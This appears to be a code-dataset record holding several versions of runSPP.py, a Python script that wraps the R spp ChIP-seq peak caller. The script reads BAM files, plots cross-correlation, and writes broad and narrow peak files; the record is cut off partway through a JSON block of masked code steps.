'float', help='z threshold [default=%default].')
parser.add_option('--bin', dest='bin', type='int', help=
'bin tags within the specified number of basepairs to speed up calculation; increasing bin size decreases the accuracy of the determined parameters [default=%default]'
)
parser.add_option('--spp-srange-min', dest='srange_min', type='float',
help=
'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'
)
parser.add_option('--spp-srange-max', dest='srange_max', type='float',
help=
'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'
)
parser.set_defaults(input_format='bam', threads=1, fdr_threshold=0.05,
window_size=1000, offset=125, srange_min=50, srange_max=500, bin=5,
z_threshold=3)
options, args = E.start(parser, argv=argv)
if len(args) != 2:
raise ValueError(
'please specify a filename with sample data and an output file')
filename_sample, filename_output = args[0], args[1]
filename_control = options.control_filename
R.library('spp')
R.library('snow')
E.info('reading data')
R("chip.data <- read.bam.tags('%s')" % filename_sample)
R("input.data <- read.bam.tags('%s')" % filename_control)
R('cluster = makeCluster( %i )' % options.threads)
E.info('computing binding characteristics')
srange_min, srange_max = options.srange_min, options.srange_max
bin = options.bin
R(
"""binding.characteristics <- get.binding.characteristics(chip.data,
srange=c(%(srange_min)i,%(srange_max)i),
bin=%(bin)s,
cluster=cluster);"""
% locals())
options.stdout.write('shift\t%i\n' % R('binding.characteristics$peak$x')[0]
)
E.info('plot cross correlation profile')
R('pdf(file="%s.crosscorrelation.pdf",width=5,height=5)' % filename_output)
R('par(mar = c(3.5,3.5,1.0,0.5), mgp = c(2,0.65,0), cex = 0.8);')
R("""plot(binding.characteristics$cross.correlation,
type='l',
xlab="strand shift",
ylab="cross-correlation");"""
)
R('abline(v=binding.characteristics$peak$x,lty=2,col=2)')
R('dev.off();')
E.info('selecting informative tags based on the binding characteristics')
R("""chip.data <- select.informative.tags(
chip.data,binding.characteristics);"""
)
R("""input.data <- select.informative.tags(
input.data,binding.characteristics);"""
)
E.info('outputting broad peaks')
window_size, z_threshold = options.window_size, options.z_threshold
R(
"""broad.clusters <- get.broad.enrichment.clusters(chip.data,input.data,
window.size=%(window_size)i,
z.thr=%(z_threshold)f,
tag.shift=round(binding.characteristics$peak$x/2))"""
% locals())
R('write.broadpeak.info(broad.clusters,"%s.broadpeak.txt")' %
filename_output)
R('detection.window.halfsize <- binding.characteristics$whs;')
E.info('determining binding positions using wtd method')
fdr = options.fdr_threshold
R(
"""bp <- find.binding.positions(
signal.data=chip.data,control.data=input.data,
fdr=%(fdr)f,whs=detection.window.halfsize,cluster=cluster)"""
% locals())
options.stdout.write('detected_peaks\t%i\n' % R(
'sum(unlist(lapply(bp$npl,function(d) length(d$x))))')[0])
R('output.binding.results(bp,"%s.summit.txt");' % filename_output)
R(
"""bp <- add.broad.peak.regions(chip.data,input.data,bp,
window.size=%(window_size)i,z.thr=%(z_threshold)f)"""
% locals())
R('write.narrowpeak.binding(bp,"%s.narrowpeak.txt")' % filename_output)
E.stop()
if __name__ == '__main__':
sys.exit(main(sys.argv))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import os
import sys
import subprocess
import collections
from cgatcore import experiment as E
from rpy2.robjects import r as R
def bamToBed(infile, outfile):
"""convert bam to bed with bedtools."""
statement = 'bamToBed -i %(infile)s > %(outfile)s' % locals()
E.debug("executing statement '%s'" % statement)
retcode = subprocess.call(statement, cwd=os.getcwd(), shell=True)
if retcode < 0:
raise OSError('Child was terminated by signal %i: \n%s\n' % (-
retcode, statement))
return outfile
SPPPeak = collections.namedtuple('SPPPeak',
'contig unrefined_start unrefined_end strand posterior summit height refined_start refined_end median fdr'
)
def iteratePeaks(infile):
"""iterate of zinba peaks in infile."""
for line in infile:
if line.startswith('#'):
continue
if line.startswith('PEAKID\tChrom'):
continue
if line.startswith('\n'):
continue
data = line[:-1].split('\t')
if len(data) != 12:
raise ValueError('could not parse line %s' % line)
data[2] = max(int(data[2]) - 1, 0)
data[3] = int(data[3])
data[5] = float(data[5])
data[6] = max(int(data[6]) - 1, 0)
data[7] = int(data[7])
data[8] = max(int(data[8]) - 1, 0)
data[9] = int(data[9])
data[10] = int(data[10])
data[11] = float(data[11])
yield SPPPeak._make(data[1:])
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv:
argv = sys.argv
parser = E.OptionParser(version='%prog version: $Id$', usage=globals()[
'__doc__'])
parser.add_option('-f', '--input-format', dest='input_format', type=
'choice', choices=('bam',), help=
'input file format [default=%default].')
parser.add_option('-w', '--window-size', dest='window_size', type='int',
help='window size [default=%default].')
parser.add_option('-c', '--control-filename', dest='control_filename',
type='string', help=
'filename of input/control data in bed format [default=%default].')
parser.add_option('-t', '--threads', dest='threads', type='int', help=
'number of threads to use [default=%default].')
parser.add_option('-q', '--fdr-threshold', dest='fdr_threshold', type=
'float', help='fdr threshold [default=%default].')
parser.add_option('-z', '--spp-z-threshold', dest='z_threshold', type=
'float', help='z threshold [default=%default].')
parser.add_option('--bin', dest='bin', type='int', help=
'bin tags within the specified number of basepairs to speed up calculation; increasing bin size decreases the accuracy of the determined parameters [default=%default]'
)
parser.add_option('--spp-srange-min', dest='srange_min', type='float',
help=
'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'
)
parser.add_option('--spp-srange-max', dest='srange_max', type='float',
help=
'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'
)
parser.set_defaults(input_format='bam', threads=1, fdr_threshold=0.05,
window_size=1000, offset=125, srange_min=50, srange_max=500, bin=5,
z_threshold=3)
options, args = E.start(parser, argv=argv)
if len(args) != 2:
raise ValueError(
'please specify a filename with sample data and an output file')
filename_sample, filename_output = args[0], args[1]
filename_control = options.control_filename
R.library('spp')
R.library('snow')
E.info('reading data')
R("chip.data <- read.bam.tags('%s')" % filename_sample)
R("input.data <- read.bam.tags('%s')" % filename_control)
R('cluster = makeCluster( %i )' % options.threads)
E.info('computing binding characteristics')
srange_min, srange_max = options.srange_min, options.srange_max
bin = options.bin
R(
"""binding.characteristics <- get.binding.characteristics(chip.data,
srange=c(%(srange_min)i,%(srange_max)i),
bin=%(bin)s,
cluster=cluster);"""
% locals())
options.stdout.write('shift\t%i\n' % R('binding.characteristics$peak$x')[0]
)
E.info('plot cross correlation profile')
R('pdf(file="%s.crosscorrelation.pdf",width=5,height=5)' % filename_output)
R('par(mar = c(3.5,3.5,1.0,0.5), mgp = c(2,0.65,0), cex = 0.8);')
R("""plot(binding.characteristics$cross.correlation,
type='l',
xlab="strand shift",
ylab="cross-correlation");"""
)
R('abline(v=binding.characteristics$peak$x,lty=2,col=2)')
R('dev.off();')
E.info('selecting informative tags based on the binding characteristics')
R("""chip.data <- select.informative.tags(
chip.data,binding.characteristics);"""
)
R("""input.data <- select.informative.tags(
input.data,binding.characteristics);"""
)
E.info('outputting broad peaks')
window_size, z_threshold = options.window_size, options.z_threshold
R(
"""broad.clusters <- get.broad.enrichment.clusters(chip.data,input.data,
window.size=%(window_size)i,
z.thr=%(z_threshold)f,
tag.shift=round(binding.characteristics$peak$x/2))"""
% locals())
R('write.broadpeak.info(broad.clusters,"%s.broadpeak.txt")' %
filename_output)
R('detection.window.halfsize <- binding.characteristics$whs;')
E.info('determining binding positions using wtd method')
fdr = options.fdr_threshold
R(
"""bp <- find.binding.positions(
signal.data=chip.data,control.data=input.data,
fdr=%(fdr)f,whs=detection.window.halfsize,cluster=cluster)"""
% locals())
options.stdout.write('detected_peaks\t%i\n' % R(
'sum(unlist(lapply(bp$npl,function(d) length(d$x))))')[0])
R('output.binding.results(bp,"%s.summit.txt");' % filename_output)
R(
"""bp <- add.broad.peak.regions(chip.data,input.data,bp,
window.size=%(window_size)i,z.thr=%(z_threshold)f)"""
% locals())
R('write.narrowpeak.binding(bp,"%s.narrowpeak.txt")' % filename_output)
E.stop()
if __name__ == '__main__':
sys.exit(main(sys.argv))
<|reserved_special_token_1|>
'''
runSPP.py - wrap spp peak caller
========================================
:Tags: Python
Purpose
-------
Runs the spp peak caller.
The workflow follows the tutorial at:
http://compbio.med.harvard.edu/Supplements/ChIP-seq/tutorial.html
Usage
-----
Documentation
-------------
Requirements:
* spp >= ?
* snow >= 0.3.13
* bedtools >= 2.21.0
Code
----
'''
import os
import sys
import subprocess
import collections
from cgatcore import experiment as E
from rpy2.robjects import r as R
def bamToBed(infile, outfile):
'''convert bam to bed with bedtools.'''
statement = "bamToBed -i %(infile)s > %(outfile)s" % locals()
E.debug("executing statement '%s'" % statement)
retcode = subprocess.call(statement,
cwd=os.getcwd(),
shell=True)
if retcode < 0:
raise OSError("Child was terminated by signal %i: \n%s\n" %
(-retcode, statement))
return outfile
SPPPeak = collections.namedtuple(
"SPPPeak",
"contig unrefined_start unrefined_end strand "
"posterior summit height refined_start refined_end median fdr")
def iteratePeaks(infile):
'''iterate of zinba peaks in infile.'''
for line in infile:
if line.startswith("#"):
continue
if line.startswith("PEAKID\tChrom"):
continue
# skip empty lines
if line.startswith("\n"):
continue
data = line[:-1].split("\t")
if len(data) != 12:
raise ValueError("could not parse line %s" % line)
# I assume these are 1-based coordinates
data[2] = max(int(data[2]) - 1, 0)
# end
data[3] = int(data[3])
# posterior
data[5] = float(data[5])
# summit
data[6] = max(int(data[6]) - 1, 0)
# height
data[7] = int(data[7])
# refined_start
data[8] = max(int(data[8]) - 1, 0)
# end
data[9] = int(data[9])
# median
data[10] = int(data[10])
# qvalue
data[11] = float(data[11])
yield SPPPeak._make(data[1:])
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv:
argv = sys.argv
# setup command line parser
parser = E.OptionParser(version="%prog version: $Id$",
usage=globals()["__doc__"])
parser.add_option("-f", "--input-format", dest="input_format",
type="choice",
choices=("bam",),
help="input file format [default=%default].")
parser.add_option("-w", "--window-size", dest="window_size", type="int",
help="window size [default=%default].")
parser.add_option("-c", "--control-filename",
dest="control_filename",
type="string",
help="filename of input/control data in "
"bed format [default=%default].")
parser.add_option("-t", "--threads", dest="threads", type="int",
help="number of threads to use [default=%default].")
parser.add_option("-q", "--fdr-threshold",
dest="fdr_threshold", type="float",
help="fdr threshold [default=%default].")
parser.add_option("-z", "--spp-z-threshold", dest="z_threshold", type="float",
help="z threshold [default=%default].")
parser.add_option("--bin", dest="bin", type="int",
help="bin tags within the specified number "
" of basepairs to speed up calculation;"
" increasing bin size decreases the accuracy "
"of the determined parameters [default=%default]")
parser.add_option("--spp-srange-min", dest="srange_min", type="float",
help="srange gives the possible range for the "
" size of the protected region;"
" srange should be higher than tag length; "
" making the upper boundary too high"
" will increase calculation time [%default]")
parser.add_option("--spp-srange-max", dest="srange_max", type="float",
help="srange gives the possible range for the "
" size of the protected region;"
" srange should be higher than tag length; "
" making the upper boundary too high"
" will increase calculation time [%default]")
parser.set_defaults(
input_format="bam",
threads=1,
fdr_threshold=0.05,
window_size=1000,
offset=125,
srange_min=50,
srange_max=500,
bin=5,
z_threshold=3,
)
# add common options (-h/--help, ...) and parse command line
(options, args) = E.start(parser, argv=argv)
if len(args) != 2:
raise ValueError(
"please specify a filename with sample data and an output file")
filename_sample, filename_output = args[0], args[1]
filename_control = options.control_filename
# load Zinba
R.library('spp')
R.library('snow')
# read data
E.info("reading data")
R('''chip.data <- read.bam.tags('%s')''' % filename_sample)
R('''input.data <- read.bam.tags('%s')''' % filename_control)
R('''cluster = makeCluster( %i )''' % (options.threads))
E.info("computing binding characteristics")
# get binding info from cross-correlation profile
# srange gives the possible range for the size of the protected region;
# srange should be higher than tag length; making the upper boundary too
# high will increase calculation time
# bin - bin tags within the specified number of basepairs to speed
# up calculation; increasing bin size decreases the accuracy of
# the determined parameters
srange_min, srange_max = options.srange_min, options.srange_max
bin = options.bin
R('''binding.characteristics <- get.binding.characteristics(chip.data,
srange=c(%(srange_min)i,%(srange_max)i),
bin=%(bin)s,
cluster=cluster);''' % locals())
# print out binding peak separation distance
options.stdout.write(
"shift\t%i\n" % R('''binding.characteristics$peak$x''')[0])
##################################################
##################################################
##################################################
E.info("plot cross correlation profile")
# plot cross-correlation profile
R('''pdf(file="%s.crosscorrelation.pdf",width=5,height=5)''' %
filename_output)
R('''par(mar = c(3.5,3.5,1.0,0.5), mgp = c(2,0.65,0), cex = 0.8);''')
R('''plot(binding.characteristics$cross.correlation,
type='l',
xlab="strand shift",
ylab="cross-correlation");''')
R('''abline(v=binding.characteristics$peak$x,lty=2,col=2)''')
R('''dev.off();''')
E.info("selecting informative tags based on the binding characteristics")
# select informative tags based on the binding characteristics
R('''chip.data <- select.informative.tags(
chip.data,binding.characteristics);''')
R('''input.data <- select.informative.tags(
input.data,binding.characteristics);''')
E.info("outputting broad peaks")
window_size, z_threshold = options.window_size, options.z_threshold
R('''broad.clusters <- get.broad.enrichment.clusters(chip.data,input.data,
window.size=%(window_size)i,
z.thr=%(z_threshold)f,
tag.shift=round(binding.characteristics$peak$x/2))''' % locals())
# write out in broadPeak format
R('''write.broadpeak.info(broad.clusters,"%s.broadpeak.txt")''' %
filename_output)
# binding detection parameters desired FDR (1%). Alternatively, an
# E-value can be supplied to the method calls below instead of the
# fdr parameter the binding.characteristics contains the optimized
# half-size for binding detection window
R('''detection.window.halfsize <- binding.characteristics$whs;''')
# determine binding positions using wtd method
E.info("determining binding positions using wtd method")
fdr = options.fdr_threshold
R('''bp <- find.binding.positions(
signal.data=chip.data,control.data=input.data,
fdr=%(fdr)f,whs=detection.window.halfsize,cluster=cluster)''' % locals())
options.stdout.write("detected_peaks\t%i\n" % R(
'''sum(unlist(lapply(bp$npl,function(d) length(d$x))))''')[0])
# output detected binding positions
R('''output.binding.results(bp,"%s.summit.txt");''' % filename_output)
R('''bp <- add.broad.peak.regions(chip.data,input.data,bp,
window.size=%(window_size)i,z.thr=%(z_threshold)f)''' % locals())
# output using narrowPeak format
R('''write.narrowpeak.binding(bp,"%s.narrowpeak.txt")''' %
filename_output)
# write footer and output benchmark information.
E.stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
|
flexible
|
{
"blob_id": "e886b88a0b7e8c06772fe8a9554cab1bfe9e94a7",
"index": 7208,
"step-1": "<mask token>\n\n\ndef bamToBed(infile, outfile):\n \"\"\"convert bam to bed with bedtools.\"\"\"\n statement = 'bamToBed -i %(infile)s > %(outfile)s' % locals()\n E.debug(\"executing statement '%s'\" % statement)\n retcode = subprocess.call(statement, cwd=os.getcwd(), shell=True)\n if retcode < 0:\n raise OSError('Child was terminated by signal %i: \\n%s\\n' % (-\n retcode, statement))\n return outfile\n\n\n<mask token>\n\n\ndef iteratePeaks(infile):\n \"\"\"iterate of zinba peaks in infile.\"\"\"\n for line in infile:\n if line.startswith('#'):\n continue\n if line.startswith('PEAKID\\tChrom'):\n continue\n if line.startswith('\\n'):\n continue\n data = line[:-1].split('\\t')\n if len(data) != 12:\n raise ValueError('could not parse line %s' % line)\n data[2] = max(int(data[2]) - 1, 0)\n data[3] = int(data[3])\n data[5] = float(data[5])\n data[6] = max(int(data[6]) - 1, 0)\n data[7] = int(data[7])\n data[8] = max(int(data[8]) - 1, 0)\n data[9] = int(data[9])\n data[10] = int(data[10])\n data[11] = float(data[11])\n yield SPPPeak._make(data[1:])\n\n\ndef main(argv=None):\n \"\"\"script main.\n\n parses command line options in sys.argv, unless *argv* is given.\n \"\"\"\n if not argv:\n argv = sys.argv\n parser = E.OptionParser(version='%prog version: $Id$', usage=globals()[\n '__doc__'])\n parser.add_option('-f', '--input-format', dest='input_format', type=\n 'choice', choices=('bam',), help=\n 'input file format [default=%default].')\n parser.add_option('-w', '--window-size', dest='window_size', type='int',\n help='window size [default=%default].')\n parser.add_option('-c', '--control-filename', dest='control_filename',\n type='string', help=\n 'filename of input/control data in bed format [default=%default].')\n parser.add_option('-t', '--threads', dest='threads', type='int', help=\n 'number of threads to use [default=%default].')\n parser.add_option('-q', '--fdr-threshold', dest='fdr_threshold', type=\n 'float', help='fdr threshold [default=%default].')\n parser.add_option('-z', '--spp-z-threshold', dest='z_threshold', type=\n 'float', help='z threshold [default=%default].')\n parser.add_option('--bin', dest='bin', type='int', help=\n 'bin tags within the specified number of basepairs to speed up calculation; increasing bin size decreases the accuracy of the determined parameters [default=%default]'\n )\n parser.add_option('--spp-srange-min', dest='srange_min', type='float',\n help=\n 'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'\n )\n parser.add_option('--spp-srange-max', dest='srange_max', type='float',\n help=\n 'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'\n )\n parser.set_defaults(input_format='bam', threads=1, fdr_threshold=0.05,\n window_size=1000, offset=125, srange_min=50, srange_max=500, bin=5,\n z_threshold=3)\n options, args = E.start(parser, argv=argv)\n if len(args) != 2:\n raise ValueError(\n 'please specify a filename with sample data and an output file')\n filename_sample, filename_output = args[0], args[1]\n filename_control = options.control_filename\n R.library('spp')\n R.library('snow')\n E.info('reading data')\n R(\"chip.data <- read.bam.tags('%s')\" % filename_sample)\n R(\"input.data <- read.bam.tags('%s')\" % filename_control)\n R('cluster = makeCluster( %i )' % options.threads)\n E.info('computing binding characteristics')\n srange_min, srange_max = options.srange_min, options.srange_max\n bin = options.bin\n R(\n \"\"\"binding.characteristics <- get.binding.characteristics(chip.data,\n srange=c(%(srange_min)i,%(srange_max)i),\n bin=%(bin)s,\n cluster=cluster);\"\"\"\n % locals())\n options.stdout.write('shift\\t%i\\n' % R('binding.characteristics$peak$x')[0]\n )\n E.info('plot cross correlation profile')\n R('pdf(file=\"%s.crosscorrelation.pdf\",width=5,height=5)' % filename_output)\n R('par(mar = c(3.5,3.5,1.0,0.5), mgp = c(2,0.65,0), cex = 0.8);')\n R(\"\"\"plot(binding.characteristics$cross.correlation,\n type='l',\n xlab=\"strand shift\",\n ylab=\"cross-correlation\");\"\"\"\n )\n R('abline(v=binding.characteristics$peak$x,lty=2,col=2)')\n R('dev.off();')\n E.info('selecting informative tags based on the binding characteristics')\n R(\"\"\"chip.data <- select.informative.tags(\n chip.data,binding.characteristics);\"\"\"\n )\n R(\"\"\"input.data <- select.informative.tags(\n input.data,binding.characteristics);\"\"\"\n )\n E.info('outputting broad peaks')\n window_size, z_threshold = options.window_size, options.z_threshold\n R(\n \"\"\"broad.clusters <- get.broad.enrichment.clusters(chip.data,input.data,\n window.size=%(window_size)i,\n z.thr=%(z_threshold)f,\n tag.shift=round(binding.characteristics$peak$x/2))\"\"\"\n % locals())\n R('write.broadpeak.info(broad.clusters,\"%s.broadpeak.txt\")' %\n filename_output)\n R('detection.window.halfsize <- binding.characteristics$whs;')\n E.info('determining binding positions using wtd method')\n fdr = options.fdr_threshold\n R(\n \"\"\"bp <- find.binding.positions(\n signal.data=chip.data,control.data=input.data,\n fdr=%(fdr)f,whs=detection.window.halfsize,cluster=cluster)\"\"\"\n % locals())\n options.stdout.write('detected_peaks\\t%i\\n' % R(\n 'sum(unlist(lapply(bp$npl,function(d) length(d$x))))')[0])\n R('output.binding.results(bp,\"%s.summit.txt\");' % filename_output)\n R(\n \"\"\"bp <- add.broad.peak.regions(chip.data,input.data,bp,\n window.size=%(window_size)i,z.thr=%(z_threshold)f)\"\"\"\n % locals())\n R('write.narrowpeak.binding(bp,\"%s.narrowpeak.txt\")' % filename_output)\n E.stop()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef bamToBed(infile, outfile):\n \"\"\"convert bam to bed with bedtools.\"\"\"\n statement = 'bamToBed -i %(infile)s > %(outfile)s' % locals()\n E.debug(\"executing statement '%s'\" % statement)\n retcode = subprocess.call(statement, cwd=os.getcwd(), shell=True)\n if retcode < 0:\n raise OSError('Child was terminated by signal %i: \\n%s\\n' % (-\n retcode, statement))\n return outfile\n\n\n<mask token>\n\n\ndef iteratePeaks(infile):\n \"\"\"iterate of zinba peaks in infile.\"\"\"\n for line in infile:\n if line.startswith('#'):\n continue\n if line.startswith('PEAKID\\tChrom'):\n continue\n if line.startswith('\\n'):\n continue\n data = line[:-1].split('\\t')\n if len(data) != 12:\n raise ValueError('could not parse line %s' % line)\n data[2] = max(int(data[2]) - 1, 0)\n data[3] = int(data[3])\n data[5] = float(data[5])\n data[6] = max(int(data[6]) - 1, 0)\n data[7] = int(data[7])\n data[8] = max(int(data[8]) - 1, 0)\n data[9] = int(data[9])\n data[10] = int(data[10])\n data[11] = float(data[11])\n yield SPPPeak._make(data[1:])\n\n\ndef main(argv=None):\n \"\"\"script main.\n\n parses command line options in sys.argv, unless *argv* is given.\n \"\"\"\n if not argv:\n argv = sys.argv\n parser = E.OptionParser(version='%prog version: $Id$', usage=globals()[\n '__doc__'])\n parser.add_option('-f', '--input-format', dest='input_format', type=\n 'choice', choices=('bam',), help=\n 'input file format [default=%default].')\n parser.add_option('-w', '--window-size', dest='window_size', type='int',\n help='window size [default=%default].')\n parser.add_option('-c', '--control-filename', dest='control_filename',\n type='string', help=\n 'filename of input/control data in bed format [default=%default].')\n parser.add_option('-t', '--threads', dest='threads', type='int', help=\n 'number of threads to use [default=%default].')\n parser.add_option('-q', '--fdr-threshold', dest='fdr_threshold', type=\n 'float', help='fdr threshold [default=%default].')\n parser.add_option('-z', '--spp-z-threshold', dest='z_threshold', type=\n 'float', help='z threshold [default=%default].')\n parser.add_option('--bin', dest='bin', type='int', help=\n 'bin tags within the specified number of basepairs to speed up calculation; increasing bin size decreases the accuracy of the determined parameters [default=%default]'\n )\n parser.add_option('--spp-srange-min', dest='srange_min', type='float',\n help=\n 'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'\n )\n parser.add_option('--spp-srange-max', dest='srange_max', type='float',\n help=\n 'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'\n )\n parser.set_defaults(input_format='bam', threads=1, fdr_threshold=0.05,\n window_size=1000, offset=125, srange_min=50, srange_max=500, bin=5,\n z_threshold=3)\n options, args = E.start(parser, argv=argv)\n if len(args) != 2:\n raise ValueError(\n 'please specify a filename with sample data and an output file')\n filename_sample, filename_output = args[0], args[1]\n filename_control = options.control_filename\n R.library('spp')\n R.library('snow')\n E.info('reading data')\n R(\"chip.data <- read.bam.tags('%s')\" % filename_sample)\n R(\"input.data <- read.bam.tags('%s')\" % filename_control)\n R('cluster = makeCluster( %i )' % options.threads)\n E.info('computing binding characteristics')\n srange_min, srange_max = options.srange_min, options.srange_max\n bin = options.bin\n R(\n \"\"\"binding.characteristics <- get.binding.characteristics(chip.data,\n srange=c(%(srange_min)i,%(srange_max)i),\n bin=%(bin)s,\n cluster=cluster);\"\"\"\n % locals())\n options.stdout.write('shift\\t%i\\n' % R('binding.characteristics$peak$x')[0]\n )\n E.info('plot cross correlation profile')\n R('pdf(file=\"%s.crosscorrelation.pdf\",width=5,height=5)' % filename_output)\n R('par(mar = c(3.5,3.5,1.0,0.5), mgp = c(2,0.65,0), cex = 0.8);')\n R(\"\"\"plot(binding.characteristics$cross.correlation,\n type='l',\n xlab=\"strand shift\",\n ylab=\"cross-correlation\");\"\"\"\n )\n R('abline(v=binding.characteristics$peak$x,lty=2,col=2)')\n R('dev.off();')\n E.info('selecting informative tags based on the binding characteristics')\n R(\"\"\"chip.data <- select.informative.tags(\n chip.data,binding.characteristics);\"\"\"\n )\n R(\"\"\"input.data <- select.informative.tags(\n input.data,binding.characteristics);\"\"\"\n )\n E.info('outputting broad peaks')\n window_size, z_threshold = options.window_size, options.z_threshold\n R(\n \"\"\"broad.clusters <- get.broad.enrichment.clusters(chip.data,input.data,\n window.size=%(window_size)i,\n z.thr=%(z_threshold)f,\n tag.shift=round(binding.characteristics$peak$x/2))\"\"\"\n % locals())\n R('write.broadpeak.info(broad.clusters,\"%s.broadpeak.txt\")' %\n filename_output)\n R('detection.window.halfsize <- binding.characteristics$whs;')\n E.info('determining binding positions using wtd method')\n fdr = options.fdr_threshold\n R(\n \"\"\"bp <- find.binding.positions(\n signal.data=chip.data,control.data=input.data,\n fdr=%(fdr)f,whs=detection.window.halfsize,cluster=cluster)\"\"\"\n % locals())\n options.stdout.write('detected_peaks\\t%i\\n' % R(\n 'sum(unlist(lapply(bp$npl,function(d) length(d$x))))')[0])\n R('output.binding.results(bp,\"%s.summit.txt\");' % filename_output)\n R(\n \"\"\"bp <- add.broad.peak.regions(chip.data,input.data,bp,\n window.size=%(window_size)i,z.thr=%(z_threshold)f)\"\"\"\n % locals())\n R('write.narrowpeak.binding(bp,\"%s.narrowpeak.txt\")' % filename_output)\n E.stop()\n\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv))\n",
"step-3": "<mask token>\n\n\ndef bamToBed(infile, outfile):\n \"\"\"convert bam to bed with bedtools.\"\"\"\n statement = 'bamToBed -i %(infile)s > %(outfile)s' % locals()\n E.debug(\"executing statement '%s'\" % statement)\n retcode = subprocess.call(statement, cwd=os.getcwd(), shell=True)\n if retcode < 0:\n raise OSError('Child was terminated by signal %i: \\n%s\\n' % (-\n retcode, statement))\n return outfile\n\n\nSPPPeak = collections.namedtuple('SPPPeak',\n 'contig unrefined_start unrefined_end strand posterior summit height refined_start refined_end median fdr'\n )\n\n\ndef iteratePeaks(infile):\n \"\"\"iterate of zinba peaks in infile.\"\"\"\n for line in infile:\n if line.startswith('#'):\n continue\n if line.startswith('PEAKID\\tChrom'):\n continue\n if line.startswith('\\n'):\n continue\n data = line[:-1].split('\\t')\n if len(data) != 12:\n raise ValueError('could not parse line %s' % line)\n data[2] = max(int(data[2]) - 1, 0)\n data[3] = int(data[3])\n data[5] = float(data[5])\n data[6] = max(int(data[6]) - 1, 0)\n data[7] = int(data[7])\n data[8] = max(int(data[8]) - 1, 0)\n data[9] = int(data[9])\n data[10] = int(data[10])\n data[11] = float(data[11])\n yield SPPPeak._make(data[1:])\n\n\ndef main(argv=None):\n \"\"\"script main.\n\n parses command line options in sys.argv, unless *argv* is given.\n \"\"\"\n if not argv:\n argv = sys.argv\n parser = E.OptionParser(version='%prog version: $Id$', usage=globals()[\n '__doc__'])\n parser.add_option('-f', '--input-format', dest='input_format', type=\n 'choice', choices=('bam',), help=\n 'input file format [default=%default].')\n parser.add_option('-w', '--window-size', dest='window_size', type='int',\n help='window size [default=%default].')\n parser.add_option('-c', '--control-filename', dest='control_filename',\n type='string', help=\n 'filename of input/control data in bed format [default=%default].')\n parser.add_option('-t', '--threads', dest='threads', type='int', help=\n 'number of threads to use [default=%default].')\n parser.add_option('-q', '--fdr-threshold', dest='fdr_threshold', type=\n 'float', help='fdr threshold [default=%default].')\n parser.add_option('-z', '--spp-z-threshold', dest='z_threshold', type=\n 'float', help='z threshold [default=%default].')\n parser.add_option('--bin', dest='bin', type='int', help=\n 'bin tags within the specified number of basepairs to speed up calculation; increasing bin size decreases the accuracy of the determined parameters [default=%default]'\n )\n parser.add_option('--spp-srange-min', dest='srange_min', type='float',\n help=\n 'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'\n )\n parser.add_option('--spp-srange-max', dest='srange_max', type='float',\n help=\n 'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'\n )\n parser.set_defaults(input_format='bam', threads=1, fdr_threshold=0.05,\n window_size=1000, offset=125, srange_min=50, srange_max=500, bin=5,\n z_threshold=3)\n options, args = E.start(parser, argv=argv)\n if len(args) != 2:\n raise ValueError(\n 'please specify a filename with sample data and an output file')\n filename_sample, filename_output = args[0], args[1]\n filename_control = options.control_filename\n R.library('spp')\n R.library('snow')\n E.info('reading data')\n R(\"chip.data <- read.bam.tags('%s')\" % filename_sample)\n R(\"input.data <- read.bam.tags('%s')\" % filename_control)\n R('cluster = makeCluster( %i )' % options.threads)\n E.info('computing binding characteristics')\n srange_min, srange_max = options.srange_min, options.srange_max\n bin = options.bin\n R(\n \"\"\"binding.characteristics <- get.binding.characteristics(chip.data,\n srange=c(%(srange_min)i,%(srange_max)i),\n bin=%(bin)s,\n cluster=cluster);\"\"\"\n % locals())\n options.stdout.write('shift\\t%i\\n' % R('binding.characteristics$peak$x')[0]\n )\n E.info('plot cross correlation profile')\n R('pdf(file=\"%s.crosscorrelation.pdf\",width=5,height=5)' % filename_output)\n R('par(mar = c(3.5,3.5,1.0,0.5), mgp = c(2,0.65,0), cex = 0.8);')\n R(\"\"\"plot(binding.characteristics$cross.correlation,\n type='l',\n xlab=\"strand shift\",\n ylab=\"cross-correlation\");\"\"\"\n )\n R('abline(v=binding.characteristics$peak$x,lty=2,col=2)')\n R('dev.off();')\n E.info('selecting informative tags based on the binding characteristics')\n R(\"\"\"chip.data <- select.informative.tags(\n chip.data,binding.characteristics);\"\"\"\n )\n R(\"\"\"input.data <- select.informative.tags(\n input.data,binding.characteristics);\"\"\"\n )\n E.info('outputting broad peaks')\n window_size, z_threshold = options.window_size, options.z_threshold\n R(\n \"\"\"broad.clusters <- get.broad.enrichment.clusters(chip.data,input.data,\n window.size=%(window_size)i,\n z.thr=%(z_threshold)f,\n tag.shift=round(binding.characteristics$peak$x/2))\"\"\"\n % locals())\n R('write.broadpeak.info(broad.clusters,\"%s.broadpeak.txt\")' %\n filename_output)\n R('detection.window.halfsize <- binding.characteristics$whs;')\n E.info('determining binding positions using wtd method')\n fdr = options.fdr_threshold\n R(\n \"\"\"bp <- find.binding.positions(\n signal.data=chip.data,control.data=input.data,\n fdr=%(fdr)f,whs=detection.window.halfsize,cluster=cluster)\"\"\"\n % locals())\n options.stdout.write('detected_peaks\\t%i\\n' % R(\n 'sum(unlist(lapply(bp$npl,function(d) length(d$x))))')[0])\n R('output.binding.results(bp,\"%s.summit.txt\");' % filename_output)\n R(\n \"\"\"bp <- 